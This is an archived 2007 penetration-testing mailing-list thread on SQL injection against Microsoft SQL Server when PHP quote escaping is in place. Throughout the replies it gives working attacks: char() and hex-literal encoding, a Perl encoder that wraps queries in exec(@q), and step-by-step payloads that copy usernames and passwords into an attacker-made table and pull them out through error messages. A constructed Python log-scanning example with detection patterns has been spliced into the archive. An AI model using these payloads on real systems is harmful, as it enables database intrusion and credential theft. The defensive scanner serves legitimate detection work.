RE: SQL Injection- Bypassing magic_quotes

From: Gary Oleary-Steele (garyo@sec-1.com)
Date: Fri Oct 12 2007 - 04:53:29 EDT


Danux.

Ok, bypassing single quotes in your case should not be a problem. You
can encode strings in Microsoft SQL in a number of ways.

It really depends at this point what your end goal is. Just dealing with
WHERE clause bit:

As far as I can see you're only encoding ' as %27. If that's all you have
to do to get around ' characters then I can modify my tool if it doesn't
do it already with 1 line of code (if this is the case then you're
dealing with a very very basic and broken filter, prob not magic
quotes).

$query =~ s/'/%27/g;

But if I've missed the point because I haven't read the thread (sorry, I'm
stacked out) then you can also encode strings in this format:

[Normal Version]

Select username from users WHERE username ='hello';

[Encoded version]

Select username from users WHERE username = char(0x68) + char(0x65) +
char(0x6c) + char(0x6c) + char(0x6f);

(remember when submitting this to the webserver to encode + as %2b)

Taking that one stage further, if you want to encode the entire SQL
query to remove quotes you could use this short perl script;

#!/usr/bin/perl
# Script to bypass php magic quotes
use strict;
use warnings;

print "Enter SQL query to encode:";
my $teststr = <STDIN>;
chomp $teststr;

# MSSQL wrapper: the 0x hex literal contains no quotes, so a quote filter
# (magic_quotes) never sees the real statement.
my $hardcoded_sql =
    'declare @q varchar(8000) '.
    'select @q=0x*** '.
    'exec(@q)';

my $prepared = encode_sql($teststr);
$hardcoded_sql =~ s/\*\*\*/$prepared/g;

print "\n[*]-Encoded SQL:\n\n";
print $hardcoded_sql . "\n";

sub encode_sql { # Sub to encode SQL as a hex string
    my ($sqlstr) = @_;
    my $encoded_command = '';

    # One two-digit hex pair per byte; %02x keeps bytes below 0x10 aligned
    # (%lx would emit a single digit and shift the rest of the literal).
    foreach my $byte (unpack("C*", $sqlstr)) {
        $encoded_command .= sprintf('%02x', $byte);
    }
    return $encoded_command;
}

Personally I tackle these problems in a number of ways. However, if you
want to take the entire table then this is one idea.

A problem you often come across is indexing a table, i.e. finding a
value you can increment to cycle through the values in the table. In a
recent pen test I had a number of issues with data types so I decided to
create my own table with an identity column. The identity column just
creates a sequential int value for each row in the table.

For example, let's say I have a table called users. I want to extract all
the values from the username and password columns. The first thing I
would do is create my own table to store the results; my table has an
extra identity column. I then use this to identify each row.

[Step 1] Create your table:

'; create table Danux(username varchar(50),password varchar(50), id int
identity(1,1))--

[Step 2] insert the data into your table;

'; insert into Danux select username,password from users--

[Step 3] extract the data out of your own table based on the id column:

' or 1 in (select username from Danux where id=1);--

' or 1 in (select username from Danux where id=2);--

' or 1 in (select username from Danux where id=3);--

Note: if you want both values do

' or 1 in (select username%2b%3a%2bpassword from Danux where id=1);--

(url encoded of course)

If you see the usernames or whatever in the error messages then you're
away...

Sorry I've had no time to read the complete thread. Let me know how you
get on.

Thanks
Gary Oleary-Steele
Sec-1 Ltd

p.s. if you don't have permission to create a table try creating a temp
table by prefixing ## to your table name.
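Added example (not Gary's code or the sasi tool; the host, path and log lines are constructed): a Python triage script that URL-decodes request lines and flags the quote-free MSSQL constructions used in this thread, the char() concatenation, the 0x hex literal run through exec(@q), and the "or N in (select ...)" probe, then decodes the hex and char() payloads back to text so an analyst can read what was actually sent. None of these carries a single quote, so magic_quotes-style escaping never sees them, which is why the rules match the constructions rather than the quote.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log requests (hypothetical host/path) shaped like this
# thread's payloads: plain, "or 1 in (select ...)", 0x literal via exec(@q), char().
SAMPLE_REQUESTS = [
    "GET /mod.php?id=1 HTTP/1.1",
    "GET /mod.php?id=1%27%20or%201%20in%20(select%20username%20from%20Danux"
    "%20where%20id=1)-- HTTP/1.1",
    "GET /mod.php?id=1;declare%20@q%20varchar(8000)%20select%20@q="
    "0x73656c65637420404076657273696f6e%20exec(@q)-- HTTP/1.1",
    "GET /mod.php?id=1%20or%20username=char(0x68)%2bchar(0x65)%2bchar(0x6c)"
    "%2bchar(0x6c)%2bchar(0x6f) HTTP/1.1",
]

# No single quote in any of these, so the rules match the constructions, not the quote.
RULES = {
    "hex_literal_exec": re.compile(
        r"declare\s+@\w+\s+varchar.*?=\s*0x[0-9a-f]+.*?exec\s*\(", re.I | re.S),
    "char_concat": re.compile(
        r"char\s*\(\s*0x[0-9a-f]{1,2}\s*\)\s*\+\s*char\s*\(", re.I),
    "or_n_in_select": re.compile(r"\bor\s+\d+\s+in\s*\(\s*select\b", re.I),
}
HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2})+)", re.I)
CHAR_BYTE = re.compile(r"char\s*\(\s*0x([0-9a-f]{1,2})\s*\)", re.I)


def decode_hex_literal(literal: str) -> str:
    """Reverse the Perl encoder above for triage: '0x73656c...' -> 'sel...' (needs 0x prefix)."""
    return bytes.fromhex(literal[2:]).decode("latin-1")


def decode_char_concat(fragment: str) -> str:
    """Collapse char(0x68)+char(0x65)+... back into the string it builds."""
    return "".join(chr(int(h, 16)) for h in CHAR_BYTE.findall(fragment))


# Per-rule decoder so each finding shows what the payload actually says.
DECODERS = {
    "hex_literal_exec": lambda s: decode_hex_literal(HEX_LITERAL.search(s).group(0)),
    "char_concat": decode_char_concat,
}


def scan_requests(requests):
    """Return (line_no, rule, decoded_payload) for every request that matches a rule."""
    findings = []
    for line_no, raw in enumerate(requests, 1):
        decoded = unquote_plus(raw)  # undo %27, %2b, %20 before matching
        for name, pattern in RULES.items():
            if pattern.search(decoded):
                findings.append((line_no, name, DECODERS.get(name, str)(decoded)))
    return findings
```

The scan is for log review; on the application side the fix is parameterized queries, not a stronger quote filter.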

-----Original Message-----
From: listbounce@securityfocus.com [mailto:listbounce@securityfocus.com]
On Behalf Of Danux
Sent: 11 October 2007 18:32
To: Gary Oleary-Steele; pen-test@securityfocus.com
Subject: Re: SQL Injection- Bypassing magic_quotes

Excellent Gary, the SQL version was printed,

because I was trying to execute:
' union select @@version,1,1,1-- (url encoded obviously).

But without success..!!

Well, let me check your excellent tool and thanks for that, but I
think the problem and issue of the thread is about single quotes so,
if I try to use the WHERE CLAUSE it will be filtered by the PHP app.

On 10/11/07, Gary Oleary-Steele <garyo@sec-1.com> wrote:
> Sorry, I haven't read the thread. However, if you want to extract data
> from a table I use the following syntax.
>
> %27or%201%20in%20(SQL HERE)--
>
> Note: I actually use more complex syntax to get round some data type
> issues.
>
> Don't terminate the query (i.e. don't use semicolons) and you most
> probably won't be able to select more than one result at a time. You
> could try my script to do it for you:
>
> http://www.sec-1labs.co.uk/tools/sasi.zip
>
> Or try something like bobcat or one of the other SQL injection tools out
> there.
>
> To see if it's going to work, try this
>
> http://www.site.com/mod.php?id=1%27%20or%201%20in%20(@@Version)--
>
> If that displays the SQL server version within the error then you should
> be away.
>
> But you're going to need to select each row and column at a time. For
> example if you were going for a table called users and that table had a
> username and password column. You could do:
>
> http://www.site.com/mod.php?id=1%27%20or%201%20in%20(select%20top%201%20username%2b%27%20%27%2bpassword%20from%20users)--
>
> Then you would need to use a where clause to move down the table.
>
> Sorry if I've missed something, I haven't read the thread (in a rush)
>
> Thanks
> Gary
>
> -----Original Message-----
> From: listbounce@securityfocus.com
[mailto:listbounce@securityfocus.com]
> On Behalf Of Danux
> Sent: 11 October 2007 02:00
> To: pen-test@securityfocus.com
> Subject: Re: SQL Injection- Bypassing magic_quotes
>
> Good Leo, but sadly I have already taken those steps, the backend is a
> SQL Server 2005 so xp_cmdshell and others are disabled. I only want
> to print a confidential table in order to show up that it's important
> to fix it.
>
> I think the MSSQL connection handler is executed by the first mod.php
> query so when trying to execute the second one it says the handler is
> already used, so ... I need a way to execute a second query through
> the first one... with union or something like that or, as Geoff said, a
> way to stop executing the first query (mod.php) so that the connection
> handler is not used and can execute the second one of mine (SQL
> injection).
>
> What do you think?
>
> On 10/10/07, Walsh, Leo <Leo_Walsh@jeffersonwells.com> wrote:
> > I would try a couple of things, if you haven't already.
> >
> > 1) If you aren't actually interested in the results that are obtained
> > from the query performed by mod.php then skip it. Your 1=1 selection
> > criteria might be eating up too much time. From the looks of your query
> > string it seems that you can bypass whatever filtering they are doing
> > without using 1=1.
> >
> > 2) Try selecting something much smaller than the entire messages table.
> > This is a table that might be quite large. Try selecting a single row or
> > message where date > somedate (which you may have to convert to a binary
> > value, by the way). If you know another table name then try that.
> >
> > 3) Try using a SQL Injection tool to gain sa access. Depending on the
> > purpose of your investigation gaining sa should be enough to demonstrate
> > a severe vulnerability that should be mitigated immediately.
> >
> >
> > -Leo Walsh, GSNA
> > Jefferson Wells International
> > 816-627-4222 (office)
> > 913-484-8051 (cell)
> >
> > -----Original Message-----
> > From: listbounce@securityfocus.com
> [mailto:listbounce@securityfocus.com]
> > On Behalf Of Danux
> > Sent: Tuesday, October 09, 2007 7:25 PM
> > To: pen-test@securityfocus.com
> > Subject: Re: SQL Injection- Bypassing magic_quotes
> >
> > Hi, well, after taking some examples from you (thanks in advance), I am
> > able to bypass single quotes so I can inject something simple as:
> >
> > http://www.site.com/mod.php?id=1%27%20or%201=1--
> >
> > But now, when trying to print a full table.... with the following
> > injection...:
> >
> > http://www.site.com/mod.php?id=1%27%20or%201=1--;select%20*%20from%20messages;--
> >
> > there is a Warning saying that the Connection is busy:
> >
> > Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC
> > SQL Server Driver]Connection is busy with results for another hstmt, SQL
> > state S1000 in SQLExecDirect in .........mod.php
> >
> > So, I think I need a way to execute the second query (mine) before the
> > one that mod.php executes by itself (mod.php?id=1)
> >
> > What do you think?
> >
> >
>
>
> --
> Danux, CISSP
> Chief Information Security Officer
> Macula Security Consulting Group
> www.macula-group.com
>

-- 
Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:09 EDT